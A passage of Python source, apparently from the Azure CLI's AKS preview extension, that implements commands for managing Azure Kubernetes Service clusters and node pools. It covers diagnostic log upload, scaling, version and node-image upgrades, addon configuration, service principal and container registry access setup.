    finally:
        os.remove(temp_yaml_path)

    print()

    # Prefer the read-only token (when we generated one) for the URL that is
    # displayed to the user.
    token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
    log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
                              f"{_trim_fqdn_name_containing_hcp(container_name)}?{token_in_storage_account_url}"

    print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')

    print()
    print(f'You can download Azure Storage Explorer here '
          f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
          f' to check the logs by adding the storage account using the following URL:')
    print(f'{format_hyperlink(log_storage_account_url)}')

    print()
    if not prompt_y_n('Do you want to see analysis results now?', default="n"):
        print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
              f"anytime to check the analysis results.")
    else:
        display_diagnostics_report(temp_kubeconfig_path)
def _read_periscope_yaml():
    """Return the raw text of the bundled aks-periscope deployment YAML.

    The file ships with this module under ``deploymentyaml/``; templating of
    its placeholders is done by the caller.
    """
    curr_dir = os.path.dirname(os.path.realpath(__file__))
    periscope_yaml_file = os.path.join(curr_dir, "deploymentyaml", "aks-periscope.yaml")
    # Use a context manager so the handle is always closed (the original
    # leaked the open file object).
    with open(periscope_yaml_file, "r") as yaml_file:
        return yaml_file.read()
def aks_kanalyze(cmd, client, resource_group_name, name):
    """Display the analysis results produced by a prior 'az aks kollect' run."""
    colorama.init()

    # Validate that the cluster exists (raises otherwise); the result itself
    # is not needed here.
    client.get(resource_group_name, name)

    _, kubeconfig_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name,
                        name, admin=True, path=kubeconfig_path)
    display_diagnostics_report(kubeconfig_path)
def aks_scale(cmd,  # pylint: disable=unused-argument
              client,
              resource_group_name,
              name,
              node_count,
              nodepool_name="",
              no_wait=False):
    """Scale a managed cluster's node pool to *node_count* nodes.

    :raises CLIError: when the pool name is ambiguous, the pool has the
        autoscaler enabled, or no matching pool exists.
    """
    instance = client.get(resource_group_name, name)
    _fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)

    pool_count = len(instance.agent_pool_profiles)
    if pool_count > 1 and nodepool_name == "":
        raise CLIError('There are more than one node pool in the cluster. '
                       'Please specify nodepool name or use az aks nodepool command to scale node pool')

    for profile in instance.agent_pool_profiles:
        # An empty nodepool_name is only allowed for single-pool clusters.
        is_target = profile.name == nodepool_name or (nodepool_name == "" and pool_count == 1)
        if not is_target:
            continue
        if profile.enable_auto_scaling:
            raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
        profile.count = int(node_count)  # pylint: disable=no-member
        # null out the SP and AAD profile because otherwise validation complains
        instance.service_principal_profile = None
        instance.aad_profile = None
        return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)

    raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd,    # pylint: disable=unused-argument, too-many-return-statements
                client,
                resource_group_name,
                name,
                kubernetes_version='',
                control_plane_only=False,
                no_wait=False,
                node_image_only=False,
                aks_custom_headers=None,
                yes=False):
    """Upgrade a managed cluster's Kubernetes version and/or node images.

    Behaviour:
      * ``--node-image-only``: refresh node images on every pool (mutually
        exclusive with specifying a Kubernetes version).
      * Legacy clusters (``max_agent_pools < 8``) or availability-set pools:
        control plane and all node pools are always upgraded together.
      * Otherwise ``--control-plane-only`` restricts the upgrade to the
        control plane; without it all node pools are upgraded too.

    All paths prompt for confirmation unless *yes* is set.

    :return: The begin_create_or_update poller/result, the refreshed cluster
        (node-image path), or None when the user declines a prompt.
    :raises CLIError: for conflicting flags or unsupported cluster types.
    """
    from knack.prompting import prompt_y_n
    msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
    if not yes and not prompt_y_n(msg, default="n"):
        return None

    instance = client.get(resource_group_name, name)
    _fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)

    # Detect legacy availability-set pools; they constrain what upgrade
    # combinations are allowed below.
    vmas_cluster = False
    for agent_profile in instance.agent_pool_profiles:
        if agent_profile.type.lower() == "availabilityset":
            vmas_cluster = True
            break

    if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')

    if node_image_only:
        msg = "This node image upgrade operation will run across every node pool in the cluster " \
              "and might take a while. Do you wish to continue?"
        if not yes and not prompt_y_n(msg, default="n"):
            return None
        # This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
        # nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
        for agent_pool_profile in instance.agent_pool_profiles:
            if vmas_cluster:
                # NOTE(review): this raises when the cluster *is* an
                # availability-set cluster, yet the message wording reads
                # inverted — confirm intended phrasing upstream.
                raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
                               'can only be applied on VirtualMachineScaleSets cluster.')
            agent_pool_client = cf_agent_pools(cmd.cli_ctx)
            # no_wait=True: fire off each pool's upgrade without blocking.
            _upgrade_single_nodepool_image_version(
                True, agent_pool_client, resource_group_name, name, agent_pool_profile.name, None)
        mc = client.get(resource_group_name, name)
        return _remove_nulls([mc])[0]

    # Upgrading to the version already running is a no-op unless the cluster
    # is in a failed state, where it retries/repairs the last operation.
    if instance.kubernetes_version == kubernetes_version:
        if instance.provisioning_state == "Succeeded":
            logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
                           "will occur when upgrading to the same version if the cluster is not in a failed state.",
                           instance.kubernetes_version)
        elif instance.provisioning_state == "Failed":
            logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
                           "attempt resolution of failed cluster state.", instance.kubernetes_version)

    upgrade_all = False
    instance.kubernetes_version = kubernetes_version

    # for legacy clusters, we always upgrade node pools with CCP.
    if instance.max_agent_pools < 8 or vmas_cluster:
        if control_plane_only:
            msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
                   "upgraded to {} as well. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
        upgrade_all = True
    else:
        if not control_plane_only:
            msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
                   "AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            upgrade_all = True
        else:
            msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
                   "Node pool will not change. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None

    if upgrade_all:
        for agent_profile in instance.agent_pool_profiles:
            agent_profile.orchestrator_version = kubernetes_version
            agent_profile.creation_data = None

    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None

    headers = get_aks_custom_headers(aks_custom_headers)

    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance, headers=headers)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name, snapshot_id=None):
    """Kick off a node-image-only upgrade for one agent pool.

    When *snapshot_id* is given it is forwarded to the service via the
    ``AKSSnapshotId`` custom header.
    """
    headers = {"AKSSnapshotId": snapshot_id} if snapshot_id else {}
    return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version,
                       resource_group_name, cluster_name, nodepool_name, headers=headers)
def _handle_addons_args(cmd,    # pylint: disable=too-many-statements
                        addons_str,
                        subscription_id,
                        resource_group_name,
                        addon_profiles=None,
                        workspace_resource_id=None,
                        enable_msi_auth_for_monitoring=False,
                        appgw_name=None,
                        appgw_subnet_prefix=None,
                        appgw_subnet_cidr=None,
                        appgw_id=None,
                        appgw_subnet_id=None,
                        appgw_watch_namespace=None,
                        enable_sgxquotehelper=False,
                        aci_subnet_name=None,
                        vnet_subnet_id=None,
                        enable_secret_rotation=False,
                        rotation_poll_interval=None,):
    """Translate the comma-separated ``--enable-addons`` value into addon profiles.

    Each recognized addon name is popped from the working list and a
    configured ``ManagedClusterAddonProfile`` is inserted into
    *addon_profiles*; names left over at the end are reported as errors.

    :param addons_str: Comma-separated addon names (may be empty or None).
    :param addon_profiles: Existing profile dict to extend (a fresh dict is
        created when falsy).
    :return: The updated addon-profile dict.
    :raises CLIError: for unrecognized addon names or invalid flag
        combinations (e.g. workspace id without monitoring).
    """
    if not addon_profiles:
        addon_profiles = {}

    # Working list; recognized addons are removed as they are handled so that
    # anything remaining at the end must be an unknown name.
    addons = addons_str.split(',') if addons_str else []

    if 'http_application_routing' in addons:
        addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('http_application_routing')

    if 'kube-dashboard' in addons:
        addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('kube-dashboard')

    # TODO: can we help the user find a workspace resource ID?
    if 'monitoring' in addons:
        if not workspace_resource_id:
            # use default workspace if exists else create default workspace
            workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
                cmd, subscription_id, resource_group_name)
        workspace_resource_id = sanitize_loganalytics_ws_resource_id(workspace_resource_id)

        addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True,
                                                                                 config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
                                                                                         CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
        addons.remove('monitoring')
    # a workspace resource id only makes sense together with the monitoring addon
    elif workspace_resource_id:
        raise CLIError(
            '"--workspace-resource-id" requires "--enable-addons monitoring".')

    if 'azure-policy' in addons:
        addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('azure-policy')

    if 'gitops' in addons:
        addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
        addons.remove('gitops')

    if 'ingress-appgw' in addons:
        # Application Gateway ingress: copy only the flags that were supplied
        # into the addon config.
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
        if appgw_name is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
        if appgw_subnet_prefix is not None:
            # --appgw-subnet-prefix is the legacy spelling of --appgw-subnet-cidr;
            # both write the same config key (the CIDR value wins when both given).
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
        if appgw_subnet_cidr is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
        if appgw_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
        if appgw_subnet_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
        if appgw_watch_namespace is not None:
            addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
        addons.remove('ingress-appgw')

    if 'open-service-mesh' in addons:
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
        addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
        addons.remove('open-service-mesh')

    if 'azure-keyvault-secrets-provider' in addons:
        # Defaults: secret rotation off, 2-minute poll interval.
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
        if enable_secret_rotation:
            addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
        if rotation_poll_interval is not None:
            addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
        addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
        addons.remove('azure-keyvault-secrets-provider')

    if 'confcom' in addons:
        addon_profile = ManagedClusterAddonProfile(
            enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
        if enable_sgxquotehelper:
            addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
        addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
        addons.remove('confcom')

    if 'virtual-node' in addons:
        if not aci_subnet_name or not vnet_subnet_id:
            raise CLIError(
                '"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
        # TODO: how about aciConnectorwindows, what is its addon name?
        os_type = 'Linux'
        addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
            enabled=True,
            config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
        )
        addons.remove('virtual-node')

    # error out if any (unrecognized) addons remain
    if addons:
        raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
            ",".join(addons), "are" if len(addons) > 1 else "is"))
    return addon_profiles
def _ensure_aks_service_principal(cli_ctx,
                                  service_principal=None,
                                  client_secret=None,
                                  subscription_id=None,
                                  dns_name_prefix=None,
                                  fqdn_subdomain=None,
                                  location=None,
                                  name=None):
    """Resolve (load, validate, or create) the service principal for an AKS cluster.

    Resolution order:
      1. If --service-principal was not supplied, try the credentials cached
         in ``aksServicePrincipal.json`` for this subscription.
      2. If nothing is cached, create a brand-new service principal
         (generating a client secret when none was supplied).
      3. If --service-principal was supplied, --client-secret must be too.

    The resolved credentials are written back to the cache file and returned
    in the cached-file format.

    :raises CLIError: when SP creation fails or --client-secret is missing.
    """
    file_name_aks = 'aksServicePrincipal.json'
    # TODO: This really needs to be unit tested.
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if not service_principal:
        # --service-principal not specified, try to load it from local disk
        principal_obj = load_acs_service_principal(
            subscription_id, file_name=file_name_aks)
        if principal_obj:
            service_principal = principal_obj.get('service_principal')
            client_secret = principal_obj.get('client_secret')
        else:
            # Nothing to load, make one.
            if not client_secret:
                client_secret = _create_client_secret()
            # The URL is only a unique identifier for the SP; a random salt
            # avoids collisions between clusters sharing a prefix/subdomain.
            salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
            if dns_name_prefix:
                url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
                    salt, dns_name_prefix, location)
            else:
                url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
                    salt, fqdn_subdomain, location)

            service_principal = _build_service_principal(
                rbac_client, cli_ctx, name, url, client_secret)
            if not service_principal:
                raise CLIError('Could not create a service principal with the right permissions. '
                               'Are you an Owner on this project?')
            logger.info('Created a service principal: %s', service_principal)
            # We don't need to add role assignment for this created SPN
    else:
        # --service-principal specified, validate --client-secret was too
        if not client_secret:
            raise CLIError(
                '--client-secret is required if --service-principal is specified')
    store_acs_service_principal(
        subscription_id, client_secret, service_principal, file_name=file_name_aks)
    return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
                                   min_count,
                                   max_count,
                                   node_count,
                                   agent_pool_profile):
    """Validate autoscaler flags and apply them to *agent_pool_profile*.

    When the autoscaler is enabled, requires a consistent
    ``min_count <= node_count <= max_count`` range and stores it on the
    profile; when disabled, rejects any min/max values.

    :raises CLIError: on missing or inconsistent count arguments.
    """
    if not enable_cluster_autoscaler:
        # Autoscaler off: min/max counts are meaningless and are rejected.
        if min_count is not None or max_count is not None:
            raise CLIError(
                'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
        return

    if min_count is None or max_count is None:
        raise CLIError(
            'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
    lower, upper = int(min_count), int(max_count)
    if lower > upper:
        raise CLIError(
            'value of min-count should be less than or equal to value of max-count')
    if not lower <= int(node_count) <= upper:
        raise CLIError(
            'node-count is not in the range of min-count and max-count')
    agent_pool_profile.min_count = lower
    agent_pool_profile.max_count = upper
    agent_pool_profile.enable_auto_scaling = True
def _create_client_secret():
    """Generate a random client secret (20 hex characters plus '$').

    The trailing special character satisfies AAD's service-principal secret
    complexity requirements.
    """
    random_hex = binascii.b2a_hex(os.urandom(10)).decode('utf-8')
    return random_hex + '$'
def _ensure_aks_acr(cli_ctx,
                    client_id,
                    acr_name_or_id,
                    subscription_id,    # pylint: disable=unused-argument
                    detach=False):
    """Grant — or revoke, when *detach* — the cluster identity pull access to an ACR.

    *acr_name_or_id* may be a full ACR resource ID or a bare registry name;
    a bare name is resolved across all resource groups.

    :raises CLIError: when the registry cannot be found or queried.
    """
    from msrestazure.tools import is_valid_resource_id, parse_resource_id

    # Fast path: the caller passed a full ACR resource ID.
    if is_valid_resource_id(acr_name_or_id):
        try:
            parsed = parse_resource_id(acr_name_or_id)
            acr_client = cf_container_registry_service(
                cli_ctx, subscription_id=parsed['subscription'])
            registry = acr_client.registries.get(parsed['resource_group'], parsed['name'])
        except CloudError as ex:
            raise CLIError(ex.message)
        _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
        return

    # Otherwise treat the value as a registry name and search for it.
    registry_name = acr_name_or_id
    registry_resource = 'Microsoft.ContainerRegistry/registries'
    try:
        registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
    except CloudError as ex:
        if 'was not found' in ex.message:
            raise CLIError(
                "ACR {} not found. Have you provided the right ACR name?".format(registry_name))
        raise CLIError(ex.message)
    _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
def _ensure_aks_acr_role_assignment(cli_ctx,
                                    client_id,
                                    registry_id,
                                    detach=False):
    """Create (or delete, when *detach*) the 'acrpull' role assignment on an ACR.

    :raises CLIError: when the role assignment cannot be created or removed.
    """
    if detach:
        removed = _delete_role_assignments(cli_ctx,
                                           'acrpull',
                                           client_id,
                                           scope=registry_id)
        if not removed:
            raise CLIError('Could not delete role assignments for ACR. '
                           'Are you an Owner on this subscription?')
        return

    created = add_role_assignment(cli_ctx,
                                  'acrpull',
                                  client_id,
                                  scope=registry_id)
    if not created:
        raise CLIError('Could not create a role assignment for ACR. '
                       'Are you an Owner on this subscription?')
def aks_agentpool_show(cmd,     # pylint: disable=unused-argument
                       client,
                       resource_group_name,
                       cluster_name,
                       nodepool_name):
    """Return the agent pool resource for the given cluster and pool name."""
    return client.get(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_list(cmd,     # pylint: disable=unused-argument
                       client,
                       resource_group_name,
                       cluster_name):
    """List every agent pool of the managed cluster."""
    pools = client.list(resource_group_name, cluster_name)
    return pools
def aks_agentpool_add(cmd,      # pylint: disable=unused-argument,too-many-locals
                      client,
                      resource_group_name,
                      cluster_name,
                      nodepool_name,
                      tags=None,
                      kubernetes_version=None,
                      node_zones=None,
                      enable_node_public_ip=False,
                      node_public_ip_prefix_id=None,
                      node_vm_size=None,
                      node_osdisk_type=None,
                      node_osdisk_size=0,
                      node_count=3,
                      vnet_subnet_id=None,
                      pod_subnet_id=None,
                      ppg=None,
                      max_pods=0,
                      os_type=None,
                      os_sku=None,
                      enable_fips_image=False,
                      min_count=None,
                      max_count=None,
                      enable_cluster_autoscaler=False,
                      scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
                      node_taints=None,
                      priority=CONST_SCALE_SET_PRIORITY_REGULAR,
                      eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
                      spot_max_price=float('nan'),
                      labels=None,
                      max_surge=None,
                      mode="User",
                      aks_custom_headers=None,
                      kubelet_config=None,
                      linux_os_config=None,
                      enable_encryption_at_host=False,
                      enable_ultra_ssd=False,
                      workload_runtime=None,
                      gpu_instance_profile=None,
                      snapshot_id=None,
                      crg_id=None,
                      no_wait=False):
    """Add a new agent (node) pool to an existing managed cluster.

    Builds an ``AgentPool`` model from the CLI flags (filling defaults from a
    snapshot when *snapshot_id* is given) and submits it via
    ``begin_create_or_update``.

    :return: The poller/result of the create-or-update operation.
    :raises CLIError: when the pool name already exists or autoscaler flags
        are inconsistent.
    """
    # Reject duplicate pool names up front.
    instances = client.list(resource_group_name, cluster_name)
    for agentpool_profile in instances:
        if agentpool_profile.name == nodepool_name:
            raise CLIError("Node pool {} already exists, please try a different name, "
                           "use 'aks nodepool list' to get current list of node pool".format(nodepool_name))

    upgradeSettings = AgentPoolUpgradeSettings()
    taints_array = []

    creationData = None
    if snapshot_id:
        # When creating from a snapshot, settings the user did not specify
        # default to the snapshot's values.
        snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
        if not kubernetes_version:
            kubernetes_version = snapshot.kubernetes_version
        if not os_type:
            os_type = snapshot.os_type
        if not os_sku:
            os_sku = snapshot.os_sku
        if not node_vm_size:
            node_vm_size = snapshot.vm_size

        creationData = CreationData(
            source_resource_id=snapshot_id
        )

    if not os_type:
        os_type = "Linux"

    if node_taints is not None:
        for taint in node_taints.split(','):
            try:
                taint = taint.strip()
                taints_array.append(taint)
            except ValueError:
                # NOTE(review): str.strip/list.append do not raise ValueError,
                # so this handler looks unreachable; taint validation is
                # presumably performed server-side. Kept as-is.
                raise CLIError(
                    'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')

    if node_vm_size is None:
        # Default VM size differs by node OS.
        if os_type == "Windows":
            node_vm_size = "Standard_D2s_v3"
        else:
            node_vm_size = "Standard_DS2_v2"

    if max_surge:
        upgradeSettings.max_surge = max_surge

    agent_pool = AgentPool(
        name=nodepool_name,
        tags=tags,
        node_labels=labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type=os_type,
        os_sku=os_sku,
        enable_fips=enable_fips_image,
        storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
        vnet_subnet_id=vnet_subnet_id,
        pod_subnet_id=pod_subnet_id,
        proximity_placement_group_id=ppg,
        agent_pool_type="VirtualMachineScaleSets",
        max_pods=int(max_pods) if max_pods else None,
        orchestrator_version=kubernetes_version,
        availability_zones=node_zones,
        enable_node_public_ip=enable_node_public_ip,
        node_public_ip_prefix_id=node_public_ip_prefix_id,
        node_taints=taints_array,
        scale_set_priority=priority,
        scale_down_mode=scale_down_mode,
        upgrade_settings=upgradeSettings,
        enable_encryption_at_host=enable_encryption_at_host,
        enable_ultra_ssd=enable_ultra_ssd,
        mode=mode,
        workload_runtime=workload_runtime,
        gpu_instance_profile=gpu_instance_profile,
        creation_data=creationData,
        capacity_reservation_group_id=crg_id
    )

    if priority == CONST_SCALE_SET_PRIORITY_SPOT:
        agent_pool.scale_set_eviction_policy = eviction_policy
        # NaN (the default) means "no price cap"; the service encodes that as -1.
        if isnan(spot_max_price):
            spot_max_price = -1
        agent_pool.spot_max_price = spot_max_price

    # Validates min/max/node counts and sets autoscaler fields on the pool.
    _check_cluster_autoscaler_flag(
        enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)

    if node_osdisk_size:
        agent_pool.os_disk_size_gb = int(node_osdisk_size)

    if node_osdisk_type:
        agent_pool.os_disk_type = node_osdisk_type

    if kubelet_config:
        agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)

    if linux_os_config:
        agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)

    headers = get_aks_custom_headers(aks_custom_headers)
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, headers=headers)
def aks_agentpool_scale(cmd,    # pylint: disable=unused-argument
                        client,
                        resource_group_name,
                        cluster_name,
                        nodepool_name,
                        node_count=3,
                        no_wait=False):
    """Resize an agent pool to *node_count* nodes.

    :raises CLIError: when the autoscaler is enabled on the pool or the
        requested count equals the current count.
    """
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    target_count = int(node_count)
    if instance.enable_auto_scaling:
        raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
    if target_count == instance.count:
        raise CLIError(
            "The new node count is the same as the current node count.")
    instance.count = target_count  # pylint: disable=no-member
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd,  # pylint: disable=unused-argument
                          client,
                          resource_group_name,
                          cluster_name,
                          nodepool_name,
                          kubernetes_version='',
                          no_wait=False,
                          node_image_only=False,
                          max_surge=None,
                          aks_custom_headers=None,
                          snapshot_id=None):
    """Upgrade one agent pool's Kubernetes version, or just its node image.

    ``--node-image-only`` routes to the dedicated node-image upgrade API and
    is mutually exclusive with specifying a version. When *snapshot_id* is
    given, an unspecified version defaults to the snapshot's version.

    :return: The poller/result of the underlying SDK operation.
    :raises CLIError: when both a version and --node-image-only are given.
    """
    if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')

    if node_image_only:
        # Node-image-only upgrades go through a dedicated API.
        return _upgrade_single_nodepool_image_version(no_wait,
                                                      client,
                                                      resource_group_name,
                                                      cluster_name,
                                                      nodepool_name,
                                                      snapshot_id)

    creationData = None
    if snapshot_id:
        snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
        # node_image_only is always False here (handled above); the extra
        # check mirrors the original condition.
        if not kubernetes_version and not node_image_only:
            kubernetes_version = snapshot.kubernetes_version

        creationData = CreationData(
            source_resource_id=snapshot_id
        )

    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    instance.orchestrator_version = kubernetes_version
    instance.creation_data = creationData

    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()

    if max_surge:
        instance.upgrade_settings.max_surge = max_surge

    headers = get_aks_custom_headers(aks_custom_headers)
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_get_upgrade_profile(cmd,  # pylint: disable=unused-argument
                                      client,
                                      resource_group_name,
                                      cluster_name,
                                      nodepool_name):
    """Return the available upgrade versions for one agent pool."""
    profile = client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
    return profile
def aks_agentpool_update(cmd,   # pylint: disable=unused-argument
                         client,
                         resource_group_name,
                         cluster_name,
                         nodepool_name,
                         tags=None,
                         enable_cluster_autoscaler=False,
                         disable_cluster_autoscaler=False,
                         update_cluster_autoscaler=False,
                         scale_down_mode=None,
                         min_count=None, max_count=None,
                         max_surge=None,
                         mode=None,
                         labels=None,
                         node_taints=None,
                         no_wait=False):
    """Update mutable properties of an existing agent pool.

    Supports toggling/updating the cluster autoscaler (exactly one of the
    three autoscaler switches per call), plus tags, scale-down mode, mode,
    max-surge, labels, and taints.

    :return: The poller/result of begin_create_or_update.
    :raises CLIError: when no update was requested or autoscaler flags are
        inconsistent.
    :raises InvalidArgumentValueError: for malformed taints.
    """
    # The three autoscaler switches are mutually exclusive; sum the booleans
    # to verify exactly one (or none, if another property is updated) is set.
    update_autoscaler = enable_cluster_autoscaler + \
        disable_cluster_autoscaler + update_cluster_autoscaler

    if (update_autoscaler != 1 and not tags and not scale_down_mode and not mode and not max_surge and labels is None and node_taints is None):
        # BUG FIX: the original message ended with an unbalanced quote
        # ("--node-taints without the closing double quote).
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--tags" or "--mode" or "--max-surge" or "--scale-down-mode" or "--labels" or "--node-taints"')

    instance = client.get(resource_group_name, cluster_name, nodepool_name)

    if node_taints is not None:
        taints_array = []
        # An empty string clears all taints.
        if node_taints != '':
            for taint in node_taints.split(','):
                try:
                    taint = taint.strip()
                    taints_array.append(taint)
                except ValueError:
                    # NOTE(review): strip/append do not raise ValueError, so
                    # this handler looks unreachable; kept for parity.
                    raise InvalidArgumentValueError(
                        'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
        instance.node_taints = taints_array

    if min_count is None or max_count is None:
        if enable_cluster_autoscaler or update_cluster_autoscaler:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler set.')

    if min_count is not None and max_count is not None:
        if int(min_count) > int(max_count):
            raise CLIError(
                'value of min-count should be less than or equal to value of max-count.')

    if enable_cluster_autoscaler:
        if instance.enable_auto_scaling:
            logger.warning('Autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks nodepool update --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
        instance.enable_auto_scaling = True

    if update_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            raise CLIError('Autoscaler is not enabled for this node pool.\n'
                           'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)

    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()

    if max_surge:
        instance.upgrade_settings.max_surge = max_surge

    if disable_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            logger.warning(
                'Autoscaler is already disabled for this node pool.')
            return None
        instance.enable_auto_scaling = False
        instance.min_count = None
        instance.max_count = None

    instance.tags = tags

    if scale_down_mode is not None:
        instance.scale_down_mode = scale_down_mode

    if mode is not None:
        instance.mode = mode

    if labels is not None:
        instance.node_labels = labels

    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_stop(cmd,     # pylint: disable=unused-argument
                       client,
                       resource_group_name,
                       cluster_name,
                       nodepool_name,
                       aks_custom_headers=None,
                       no_wait=False):
    """Stop an agent pool by setting its power state to 'Stopped'.

    :raises InvalidArgumentValueError: when the pool does not exist.
    """
    # Verify the pool exists before fetching/updating it.
    exists = any(pool.name.lower() == nodepool_name.lower()
                 for pool in client.list(resource_group_name, cluster_name))
    if not exists:
        raise InvalidArgumentValueError(
